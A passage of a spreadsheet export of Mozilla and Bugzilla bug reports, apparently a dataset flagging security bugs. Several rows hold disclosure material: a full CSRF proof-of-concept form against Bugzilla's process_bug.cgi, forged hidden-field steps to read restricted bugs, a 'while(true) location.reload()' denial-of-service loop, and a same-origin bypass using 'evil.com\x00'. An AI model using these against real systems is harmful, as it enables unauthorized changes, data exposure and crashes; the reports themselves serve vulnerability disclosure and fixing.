      <c r="D755" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E755" t="n">
        <v>1</v>
      </c>
      <c r="F755" t="n">
        <v>1</v>
      </c>
      <c r="G755" t="n">
        <v>4</v>
      </c>
      <c r="H755" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I755" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J755" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K755" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L755" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M755" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N755" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O755" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P755" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q755" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R755" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S755" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T755" t="n">
        <v>1</v>
      </c>
      <c r="U755" t="n">
        <v>0</v>
      </c>
      <c r="V755" t="n">
        <v>22</v>
      </c>
      <c r="W755" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Find a restricted bug (bug 28698, for example).
2. Save the page you're reading right now (a normal show_bug.cgi page).
3. Change the form action to an absolute URL on the saved page.
4. Modify hidden form elements so they read:
&lt;INPUT TYPE=HIDDEN NAME="delta_ts" VALUE="19950000000000"&gt;
&lt;INPUT TYPE=HIDDEN NAME="longdesclength" VALUE="0"&gt;
&lt;INPUT TYPE=HIDDEN NAME="id" VALUE=28698&gt;     (use bug number from step 1)
5. Load the modified page.
6. Click "commit".
Actual result:
All of the comments on bug 28698 are displayed.
Expected result:
process_bug.cgi says something to the effect of "You don't have permission to 
view this bug, so you're not allowed to change it either."
Notes:
No "mid-air collision" items are listed.  This probably has something to do 
with the bogus timestamp.</t>
        </is>
      </c>
      <c r="X755" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="756">
      <c r="A756" t="n">
        <v>511615</v>
      </c>
      <c r="B756" t="inlineStr">
        <is>
          <t>2009-08-20 02:56:07 -0700</t>
        </is>
      </c>
      <c r="C756" t="inlineStr">
        <is>
          <t>Satchel should ignore untrusted events</t>
        </is>
      </c>
      <c r="D756" t="inlineStr">
        <is>
          <t>2009-11-11 09:04:05 -0800</t>
        </is>
      </c>
      <c r="E756" t="n">
        <v>1</v>
      </c>
      <c r="F756" t="n">
        <v>1</v>
      </c>
      <c r="G756" t="n">
        <v>3</v>
      </c>
      <c r="H756" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I756" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J756" t="inlineStr">
        <is>
          <t>Form Manager</t>
        </is>
      </c>
      <c r="K756" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L756" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M756" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N756" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O756" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P756" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q756" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R756" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S756" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T756" t="n">
        <v>1</v>
      </c>
      <c r="U756" t="n">
        <v>0</v>
      </c>
      <c r="V756" t="n">
        <v>19</v>
      </c>
      <c r="W756" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
A web page can trigger the autocomplete popup on a text field, and then generate 'cursor down' events to select a particular item from the drop down. When the user presses the left or right arrow keys, the textbox value will be set to the currently selected item. The web page can then grab the value.
If a web page can convince a user to hold down or repeatedly press the left or right arrow keys, it can systematically grab all the data. I don't think this can be completely automated, since only user-generated left, right or enter key events cause the textbox to be filled.
Depending on the 'name' attribute of the textbox, different sets of data can be grabbed. e.g. 'searchbar-history' will give the autocomplete data from the Firefox search bar. 'q' will give Google search queries. This could also be used to get usernames, email addresses and even credit card numbers (I have seen a number of shopping sites that don't set autocomplete="off" on their payment pages)
Reproducible: Always
Steps to Reproduce:
See testcase (tested on Windows XP only)
Actual Results:  
Synthesized key events can manipulate the autocomplete popup.
Expected Results:  
Only user generated key events should trigger or affect autocomplete.</t>
        </is>
      </c>
      <c r="X756" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="757">
      <c r="A757" t="n">
        <v>18351</v>
      </c>
      <c r="B757" t="inlineStr">
        <is>
          <t>1999-11-09 12:40:51 -0800</t>
        </is>
      </c>
      <c r="C757" t="inlineStr">
        <is>
          <t>irix build gets deleted from 'latest' directory</t>
        </is>
      </c>
      <c r="D757" t="inlineStr">
        <is>
          <t>2001-01-12 17:58:27 -0800</t>
        </is>
      </c>
      <c r="E757" t="n">
        <v>1</v>
      </c>
      <c r="F757" t="n">
        <v>1</v>
      </c>
      <c r="G757" t="n">
        <v>5</v>
      </c>
      <c r="H757" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I757" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J757" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K757" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N757" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O757" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P757" t="inlineStr"/>
      <c r="Q757" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R757" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S757" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T757" t="n">
        <v>1</v>
      </c>
      <c r="U757" t="n">
        <v>0</v>
      </c>
      <c r="V757" t="n">
        <v>6</v>
      </c>
      <c r="W757" t="inlineStr">
        <is>
          <t>It looks like irix builds are getting created every day but they're not getting
copied to the 'latest' directory which is supposed to hold the latest daily
build for each platform. Plus, files that were previously in that directory are
getting deleted. I copied an irix binary there by hand yesterday and its gone
now.</t>
        </is>
      </c>
      <c r="X757" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="758">
      <c r="A758" t="n">
        <v>1720926</v>
      </c>
      <c r="B758" t="inlineStr">
        <is>
          <t>2021-07-16 09:57:16 -0700</t>
        </is>
      </c>
      <c r="C758" t="inlineStr">
        <is>
          <t>Location API rate limit code does not cover location.reload</t>
        </is>
      </c>
      <c r="D758" t="inlineStr">
        <is>
          <t>2022-08-26 23:22:38 -0700</t>
        </is>
      </c>
      <c r="E758" t="n">
        <v>1</v>
      </c>
      <c r="F758" t="n">
        <v>1</v>
      </c>
      <c r="G758" t="n">
        <v>3</v>
      </c>
      <c r="H758" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I758" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J758" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K758" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L758" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M758" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N758" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O758" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P758" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q758" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R758" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S758" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T758" t="n">
        <v>1</v>
      </c>
      <c r="U758" t="n">
        <v>0</v>
      </c>
      <c r="V758" t="n">
        <v>10</v>
      </c>
      <c r="W758" t="inlineStr">
        <is>
          <t>Calls to `location.reload()` are not rate limited and thus can be used to DoS the parent process.
While testing on Ubuntu this also caused Firefox to exhaust my RAM and caused the desktop environment to get slower, freeze and finally crash.
```
while(true) location.reload();
```
Marking this a sec-bug for now, because Bug 1314912 was.</t>
        </is>
      </c>
      <c r="X758" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="759">
      <c r="A759" t="n">
        <v>1137278</v>
      </c>
      <c r="B759" t="inlineStr">
        <is>
          <t>2015-02-26 08:28:37 -0800</t>
        </is>
      </c>
      <c r="C759" t="inlineStr">
        <is>
          <t>Speed up the Travis run</t>
        </is>
      </c>
      <c r="D759" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E759" t="n">
        <v>1</v>
      </c>
      <c r="F759" t="n">
        <v>1</v>
      </c>
      <c r="G759" t="n">
        <v>7</v>
      </c>
      <c r="H759" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I759" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J759" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K759" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N759" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O759" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P759" t="inlineStr"/>
      <c r="Q759" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R759" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S759" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T759" t="n">
        <v>1</v>
      </c>
      <c r="U759" t="n">
        <v>0</v>
      </c>
      <c r="V759" t="n">
        <v>15</v>
      </c>
      <c r="W759" t="inlineStr">
        <is>
          <t>The treeherder-service Travis run takes up to 15 mins to run, which is a pain to wait for. We're also going to add flake8 linting &amp; if we do combine the UI and service repos, we'll also be running other tests too.
There are some suggestions of things we can do on:
http://docs.travis-ci.com/user/speeding-up-the-build/
Mainly:
* Caching dependencies: http://docs.travis-ci.com/user/caching/ . To do this without a paid account, apparently we need to use Travis' new container based infrastructure: http://docs.travis-ci.com/user/workers/container-based-infrastructure/
* Splitting the run up into multiple sub-jobs: http://docs.travis-ci.com/user/speeding-up-the-build/#Parallelizing-your-builds-across-virtual-machines
* Using "fast_finish" to make the job fail as soon as one of the sub-jobs fail: http://docs.travis-ci.com/user/build-configuration/#Fast-finishing
There are also things we can do:
* Bug 1133268 - Turn off code coverage checks for Travis test runs
* Remove the |pip install -r requirements/pure.txt| per bug 1070470 comment 10.</t>
        </is>
      </c>
      <c r="X759" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="760">
      <c r="A760" t="n">
        <v>370445</v>
      </c>
      <c r="B760" t="inlineStr">
        <is>
          <t>2007-02-14 15:23:29 -0800</t>
        </is>
      </c>
      <c r="C760" t="inlineStr">
        <is>
          <t>embedded nulls in location.hostname confuse same-origin checks (Zalewski XSS vulnerability)</t>
        </is>
      </c>
      <c r="D760" t="inlineStr">
        <is>
          <t>2007-02-26 18:51:08 -0800</t>
        </is>
      </c>
      <c r="E760" t="n">
        <v>1</v>
      </c>
      <c r="F760" t="n">
        <v>1</v>
      </c>
      <c r="G760" t="n">
        <v>3</v>
      </c>
      <c r="H760" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I760" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J760" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K760" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L760" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M760" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N760" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O760" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P760" t="inlineStr">
        <is>
          <t>[sg:high] xss</t>
        </is>
      </c>
      <c r="Q760" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R760" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S760" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T760" t="n">
        <v>1</v>
      </c>
      <c r="U760" t="n">
        <v>4</v>
      </c>
      <c r="V760" t="n">
        <v>53</v>
      </c>
      <c r="W760" t="inlineStr">
        <is>
          <t>Michal Zalewski sent the following mail to security@mozilla.org, full-disclosure and bugtraq:
- - - - - - - - - - - - - - - - - - - - -
There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1,
but quite certainly affecting all recent versions.
The problem lies in how Firefox handles writes to the 'location.hostname'
DOM property. It is possible for a script to set it to values that would
not otherwise be accepted as a hostname when parsing a regular URL -
including a string containing \x00.
Doing this prompts a peculiar behavior: internally, DOM string variables
are not NUL-terminated, and as such, most of checks will consider
'evil.com\x00foo.example.com' to be a part of *.example.com domain. The
DNS resolver, however, and much of the remaining browser code, operates on
ASCIZ strings native to C/C++ instead, treating the aforementioned example
as 'evil.com'.
This makes it possible for evil.com to modify location.hostname as
described above, and have the resulting HTTP request still sent to
evil.com. Once the new page is loaded, the attacker will be able to set
cookies for *.example.com; he'll be also able to alter document.domain
accordingly, in order to bypass the same-origin policy for XMLHttpRequest
and cross-frame / cross-window data access.
A quick demonstration is available here:
  http://lcamtuf.dione.cc/ffhostname.html
If you want to confirm a successful exploitation, check Tools -&gt; Options
-&gt; Privacy -&gt; Show Cookies... for coredump.cx after the test; for the demo
to succeed, the browser needs to have Javascript enabled, and must accept
session cookies.
The impact is quite severe: malicious sites can manipulate authentication
cookies for third-party webpages, and, by the virtue of bypassing
same-origin policy, can possibly tamper with the way these sites are
displayed or how they work.
Regards,
/mz</t>
        </is>
      </c>
      <c r="X760" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="761">
      <c r="A761" t="n">
        <v>188440</v>
      </c>
      <c r="B761" t="inlineStr">
        <is>
          <t>2003-01-09 16:20:22 -0800</t>
        </is>
      </c>
      <c r="C761" t="inlineStr">
        <is>
          <t>textfields clobber selection when they should not.</t>
        </is>
      </c>
      <c r="D761" t="inlineStr">
        <is>
          <t>2003-02-20 17:44:54 -0800</t>
        </is>
      </c>
      <c r="E761" t="n">
        <v>1</v>
      </c>
      <c r="F761" t="n">
        <v>1</v>
      </c>
      <c r="G761" t="n">
        <v>3</v>
      </c>
      <c r="H761" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I761" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J761" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K761" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L761" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M761" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N761" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O761" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P761" t="inlineStr">
        <is>
          <t>editorbase</t>
        </is>
      </c>
      <c r="Q761" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R761" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S761" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T761" t="n">
        <v>1</v>
      </c>
      <c r="U761" t="n">
        <v>0</v>
      </c>
      <c r="V761" t="n">
        <v>20</v>
      </c>
      <c r="W761" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.3b) Gecko/20030109
Build Identifier: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.3b) Gecko/20030109
This might be like Bug 87410, but that's been aroud for a long time and this
particular problem just appeared for me.
Somewhere in the last month or two, something changed about how copy/paste under
X11 works in the URL bar. This had made it frustrating to try to paste a URL
into a location bar with another page's URL in it. IMHO, this is, at its core, a
problem with X11's stupid copy/paste mechanism, but that's not likely to change
soon so...
In the past, when I wanted to paste a completely new URL into the URL bar, I'd
do either:
Method A
1. Ctrl-l to select the URL bar
2. backspace to delete the existing text
3. Middle click to paste in the new URL
or Method B
1. Right click in URL bar
2. ctrl-a to select all old URL text
3. Backspace to delete existing text
4. Middle click to paste the new URL
This used to work fine. Now (in build 2003010908 on FreeBSD in Windowmaker), it
doesn't. In Method A, 'ctrl-l' selects all of the text in the URL bar (just like
it used to), but now that text is copied into the paste buffer, overwriting the
new URL I had just intended to paste in. Similarly, in Method B, the old text is
selected when I ctrl-a and it goes into the paste buffer. In the old behavior,
the ctrl-l/ctrl-a selection allowed me to delete the text but did not copy the
text to the clipboard.
It's conceivable that this change happened as the result of a Bug complaining
that any type of selection should result in a copy (I didn't find that bug, but
I may have not searched for the right thing). But for me at least, this makes
pasting URLs into Mozilla a HUGE pain in the neck. Yes, there are workarounds
(the current one I'm using is: *carefully* right click in URL bar, ctrl-a,
ctrl-k, paste), but this basic functionality shouldn't require workarounds, IMHO.
Reproducible: Always
Steps to Reproduce:
1. Copy a URL from another app
2. Ctrl-l in mozilla
3. Backspace to delete URL bar text
4. Paste clipboard into URL bar
Actual Results:  
The text that was previously in the URL bar is pasted back in.
Expected Results:  
The text that was selected in the external app should be pasted in.</t>
        </is>
      </c>
      <c r="X761" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="762">
      <c r="A762" t="n">
        <v>911593</v>
      </c>
      <c r="B762" t="inlineStr">
        <is>
          <t>2013-09-01 12:50:44 -0700</t>
        </is>
      </c>
      <c r="C762" t="inlineStr">
        <is>
          <t>[SECURITY] CSRF in process_bug.cgi</t>
        </is>
      </c>
      <c r="D762" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:08 -0700</t>
        </is>
      </c>
      <c r="E762" t="n">
        <v>1</v>
      </c>
      <c r="F762" t="n">
        <v>1</v>
      </c>
      <c r="G762" t="n">
        <v>4</v>
      </c>
      <c r="H762" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I762" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J762" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K762" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="L762" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M762" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N762" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O762" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P762" t="inlineStr"/>
      <c r="Q762" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R762" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S762" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T762" t="n">
        <v>1</v>
      </c>
      <c r="U762" t="n">
        <v>0</v>
      </c>
      <c r="V762" t="n">
        <v>12</v>
      </c>
      <c r="W762" t="inlineStr">
        <is>
          <t>PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org)
&lt;html&gt;
  &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt;
  &lt;body&gt;
    &lt;form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST"&gt;
      &lt;input type="hidden" name="delta&amp;#95;ts" value="aaaaaaaaaaaaaaaaaaaaa" /&gt;
      &lt;input type="hidden" name="longdesclength" value="1" /&gt;
      &lt;input type="hidden" name="id" value="21951" /&gt;
      &lt;input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" /&gt;
      &lt;input type="hidden" name="alias" value="aaaaaaaaa" /&gt;
      &lt;input type="hidden" name="short&amp;#95;desc" value="TEST2" /&gt;
      &lt;input type="hidden" name="product" value="FoodReplicator" /&gt;
      &lt;input type="hidden" name="classification" value="Unclassified" /&gt;
      &lt;input type="hidden" name="component" value="renamed&amp;#32;component" /&gt;
      &lt;input type="hidden" name="rep&amp;#95;platform" value="PC" /&gt;
      &lt;input type="hidden" name="op&amp;#95;sys" value="Linux" /&gt;
      &lt;input type="hidden" name="priority" value="P2" /&gt;
      &lt;input type="hidden" name="bug&amp;#95;severity" value="normal" /&gt;
      &lt;input type="hidden" name="target&amp;#95;milestone" value="&amp;#45;&amp;#45;&amp;#45;" /&gt;
      &lt;input type="hidden" name="assigned&amp;#95;to" value="mybutt&amp;#64;inyourface&amp;#46;com" /&gt;
      &lt;input type="hidden" name="qa&amp;#95;contact" value="" /&gt;
      &lt;input type="hidden" name="bug&amp;#95;file&amp;#95;loc" value="" /&gt;
      &lt;input type="hidden" name="status&amp;#95;whiteboard" value="" /&gt;
      &lt;input type="hidden" name="keywords" value="" /&gt;
      &lt;input type="hidden" name="tag" value="" /&gt;
      &lt;input type="hidden" name="dependson" value="" /&gt;
      &lt;input type="hidden" name="blocked" value="" /&gt;
      &lt;input type="hidden" name="newcc" value="" /&gt;
      &lt;input type="hidden" name="defined&amp;#95;bug&amp;#95;ignored" value="1" /&gt;
      &lt;input type="hidden" name="see&amp;#95;also" value="" /&gt;
      &lt;input type="hidden" name="cf&amp;#95;large&amp;#95;text" value="" /&gt;
      &lt;input type="hidden" name="cf&amp;#95;free&amp;#95;text" value="" /&gt;
      &lt;input type="hidden" name="defined&amp;#95;cf&amp;#95;mulitple&amp;#95;select" value="" /&gt;
      &lt;input type="hidden" name="cf&amp;#95;drop&amp;#95;down" value="&amp;#45;&amp;#45;&amp;#45;" /&gt;
      &lt;input type="hidden" name="cf&amp;#95;date" value="" /&gt;
      &lt;input type="hidden" name="cf&amp;#95;bug&amp;#95;id" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;8" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;8" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;9" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;9" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;11" value="X" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;5" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;5" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;10" value="X" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;6" value="X" /&gt;
      &lt;input type="hidden" name="requestee&amp;#95;type&amp;#45;6" value="" /&gt;
      &lt;input type="hidden" name="flag&amp;#95;type&amp;#45;12" value="X" /&gt;
      &lt;input type="hidden" name="estimated&amp;#95;time" value="0&amp;#46;0" /&gt;
      &lt;input type="hidden" name="work&amp;#95;time" value="0" /&gt;
      &lt;input type="hidden" name="remaining&amp;#95;time" value="0&amp;#46;0" /&gt;
      &lt;input type="hidden" name="deadline" value="" /&gt;
      &lt;input type="hidden" name="comment" value="" /&gt;
      &lt;input type="hidden" name="bug&amp;#95;status" value="CONFIRMED" /&gt;
      &lt;input type="hidden" name="resolution" value="FIXED" /&gt;
      &lt;input type="hidden" name="dup&amp;#95;id" value="" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="X762" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="763">
      <c r="A763" t="n">
        <v>1592524</v>
      </c>
      <c r="B763" t="inlineStr">
        <is>
          <t>2019-10-30 00:54:33 -0700</t>
        </is>
      </c>
      <c r="C763" t="inlineStr">
        <is>
          <t>Assertion failure: mir-&gt;resumePoint(), at js/src/jit/CodeGenerator.cpp:296</t>
        </is>
      </c>
      <c r="D763" t="inlineStr">
        <is>
          <t>2020-06-05 00:32:37 -0700</t>
        </is>
      </c>
      <c r="E763" t="n">
        <v>1</v>
      </c>
      <c r="F763" t="n">
        <v>1</v>
      </c>
      <c r="G763" t="n">
        <v>3</v>
      </c>
      <c r="H763" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I763" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J763" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K763" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L763" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M763" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N763" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O763" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P763" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q763" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R763" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S763" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T763" t="n">
        <v>1</v>
      </c>
      <c r="U763" t="n">
        <v>0</v>
      </c>
      <c r="V763" t="n">
        <v>10</v>
      </c>
      <c r="W763" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 53ebedebdb63 (build with --enable-debug --disable-optimize, run with --fuzzing-safe --ion-eager):
    See attachment.
Backtrace:
```
#0  0x0000555558353f00 in js::jit::CodeGenerator::callVMInternal (this=0x7fffef3d8000, id=js::jit::VMFunctionId::ToStringSlow, ins=0x7fffebf64ab8, dynStack=0x0) at js/src/jit/CodeGenerator.cpp:296
#1  0x00005555583f8fb6 in js::jit::CodeGenerator::callVM&lt;JSString* (*)(JSContext*, JS::Handle&lt;JS::Value&gt;), &amp;js::ToStringSlow&lt;(js::AllowGC)1&gt; &gt; (this=0x7fffef3d8000, ins=0x7fffebf64ab8, dynStack=0x0) at js/src/jit/CodeGenerator.cpp:346
#2  0x00005555583f8e63 in js::jit::CodeGenerator::visitOutOfLineCallVM&lt;JSString* (*)(JSContext*, JS::Handle&lt;JS::Value&gt;), &amp;js::ToStringSlow&lt;(js::AllowGC)1&gt;, js::jit::ArgSeq&lt;js::jit::ValueOperand&amp;&gt;, js::jit::StoreRegisterTo&gt; (this=0x7fffef3d8000, ool=0x7fffea55c7a8) at js/src/jit/CodeGenerator.cpp:525
#3  0x00005555583f8ddd in js::jit::OutOfLineCallVM&lt;JSString* (*)(JSContext*, JS::Handle&lt;JS::Value&gt;), &amp;js::ToStringSlow&lt;(js::AllowGC)1&gt;, js::jit::ArgSeq&lt;js::jit::ValueOperand&amp;&gt;, js::jit::StoreRegisterTo&gt;::accept (this=0x7fffea55c7a8, codegen=0x7fffef3d8000) at js/src/jit/CodeGenerator.cpp:490
#4  0x00005555583e2189 in js::jit::OutOfLineCodeBase&lt;js::jit::CodeGenerator&gt;::generate (this=0x7fffea55c7a8, codegen=0x7fffef3d8000) at js/src/jit/shared/CodeGenerator-shared.h:529
#5  0x0000555558211737 in js::jit::CodeGeneratorShared::generateOutOfLineCode (this=0x7fffef3d8000) at js/src/jit/shared/CodeGenerator-shared.cpp:191
#6  0x00005555582723b9 in js::jit::CodeGeneratorX86Shared::generateOutOfLineCode (this=0x7fffef3d8000) at js/src/jit/x86-shared/CodeGenerator-x86-shared.cpp:535
/snip
```
For detailed crash information, see attachment.
Setting s-s as a start because MIR seems to be involved. The testcase seems to be increasingly intermittent as more reduction happens.</t>
        </is>
      </c>
      <c r="X763" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="764">
      <c r="A764" t="n">
        <v>409381</v>
      </c>
      <c r="B764" t="inlineStr">
        <is>
          <t>2007-12-21 04:35:56 -0800</t>
